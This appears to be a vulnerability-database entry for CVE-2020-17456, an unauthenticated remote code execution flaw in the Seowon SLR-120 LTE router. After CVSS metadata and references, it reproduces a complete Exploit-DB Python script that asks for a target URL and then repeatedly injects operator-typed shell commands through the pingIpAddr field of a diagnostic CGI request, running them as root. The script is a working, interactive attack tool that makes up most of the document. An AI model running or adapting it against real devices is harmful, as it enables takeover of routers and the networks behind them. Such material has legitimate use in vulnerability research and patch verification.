Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)

vendor:

SLR-120 Router

by:

Aryan Chehreghani

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: SLR-120 Router

Affected Version From: All version

Affected Version To: All version

Patch Exists: YES

Related CWE: CVE-2020-17456

CPE: h:seowon_intech:slr-120

Metasploit:

Other Scripts:

Tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/, https://nvd.nist.gov/vuln/detail/CVE-2020-17456, http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html, http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html, https://www.exploit-db.com/exploits/50821

Nuclei Metadata: {'max-request': 2, 'vendor': 'seowonintech', 'product': 'slc-130_firmware'}

Platforms Tested: Windows 10 Enterprise x64, Linux

2022

Seowon SLR-120 Router – Remote Code Execution (Unauthenticated)

Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.

Mitigation:

Ensure that authentication is required for all remote code execution requests.

Source

Exploit-DB raw data:

# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
# Date: 2022-03-11
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
# Version: All version
# Tested on: Windows 10 Enterprise x64 , Linux
# CVE : CVE-2020-17456

# [ About - Seowon SLR-120 router ]:

#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
#The convenience of sharing wireless internet access invigorates your lifestyle, families,
#friends and workmates. Carry it around to boost your active communication anywhere.

# [ Description ]:

#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.

# [ Vulnerable products ]:

#SLR-120S42G
#SLR-120D42G
#SLR-120T42G

import requests

print ('''
###########################################################                                         
#    Seowon SLR-120S42G router - RCE (Unauthenticated)    #
#                  BY:Aryan Chehreghani                   #
#        Team:TAPESH DIGITAL SECURITY TEAM IRAN           #
#             mail:aryanchehreghani@yahoo.com              #  
#                 -+-USE:python script.py                 #
#         Example Target : http://192.168.1.1:443/        #
###########################################################
''')

url = input ("=> Enter Target : ")

while(True):

    try:
    
        cmd = input ("~Enter Command $ ")
        
        header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "207",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}

        datas = {
'Command':'Diagnostic',
'traceMode':'ping',
'reportIpOnly':'',
'pingIpAddr':';'+cmd,
'pingPktSize':'56',
'pingTimeout':'30',
'pingCount':'4',
'maxTTLCnt':'30',
'queriesCnt':'3',
'reportIpOnlyCheckbox':'on',
'logarea':'com.cgi',
'btnApply':'Apply',
'T':'1646950471018'
}

        x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)

        print(x.text)

    except:
        break